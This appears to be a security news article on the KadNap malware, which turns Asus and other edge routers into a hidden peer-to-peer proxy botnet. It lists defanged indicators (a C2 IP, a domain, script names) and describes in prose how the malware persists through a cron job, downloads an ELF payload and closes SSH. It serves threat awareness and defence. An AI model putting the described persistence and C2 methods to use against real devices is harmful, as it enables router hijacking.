KadNap Malware Compromises Over 14,000 Edge Devices, Forming a Stealth Proxy Botnet
Cybersecurity experts have identified a new malware strain named KadNap, which primarily targets Asus routers, enlisting them into a botnet designed to proxy malicious traffic. First detected in August 2025, KadNap has since infected over 14,000 devices, with more than 60% of these cases occurring in the United States. Other affected regions include Taiwan, Hong Kong, Russia, the United Kingdom, Australia, Brazil, France, Italy, and Spain.
KadNap employs a customized version of the Kademlia Distributed Hash Table (DHT) protocol. This technique conceals the IP addresses of its infrastructure within a peer-to-peer network, effectively evading traditional network monitoring methods. Compromised devices utilize the DHT protocol to locate and connect with command-and-control (C2) servers, enhancing the botnet’s resilience against detection and disruption efforts.
Once a device is compromised, it becomes part of a proxy service known as Doppelgänger (doppelganger[.]shop), which is believed to be a rebranded version of Faceless, another proxy service linked to TheMoon malware. Doppelgänger advertises residential proxies in over 50 countries, claiming to offer 100% anonymity. The service reportedly launched between May and June 2025.
Although Asus routers are the primary targets, KadNap’s operators have also deployed the malware against a variety of edge networking devices. The infection process begins with a shell script named aic.sh, downloaded from a C2 server at IP address 212.104.141[.]140. This script initiates the process of integrating the victim’s device into the peer-to-peer network. It creates a cron job that retrieves the shell script from the server every hour at the 55-minute mark, renames it to .asusrouter, and executes it.
To establish persistence, the script downloads a malicious ELF file, renames it to kad, and runs it, leading to the deployment of KadNap. The malware is capable of targeting devices running both ARM and MIPS processors.
KadNap also connects to a Network Time Protocol (NTP) server to fetch the current time and stores it along with the device’s uptime. This information is used to create a hash that helps locate other peers in the decentralized network to receive commands or download additional files.
Additional files, such as fwr.sh and /tmp/.sose, are used to close port 22—the standard TCP port for Secure Shell (SSH)—on the infected device and extract a list of C2 IP address:port combinations to connect to.
The innovative use of the DHT protocol allows the malware to establish robust communication channels that are difficult to disrupt, as it blends into legitimate peer-to-peer traffic. Further analysis indicates that not all compromised devices communicate with every C2 server, suggesting that the infrastructure is categorized based on device types and models.
The Black Lotus Labs team noted that Doppelgänger’s bots are being exploited by threat actors in the wild. They mentioned that since these Asus and other devices are sometimes co-infected with other malware, it is challenging to attribute specific malicious activities to a particular source.
Users of small office/home office (SOHO) routers are advised to keep their devices updated, reboot them regularly, change default passwords, secure management interfaces, and replace models that are end-of-life and no longer supported.
The KadNap botnet stands out among others that support anonymous proxies due to its use of a peer-to-peer network for decentralized control. The operators’ intention is clear: to avoid detection and make it difficult for defenders to protect against.
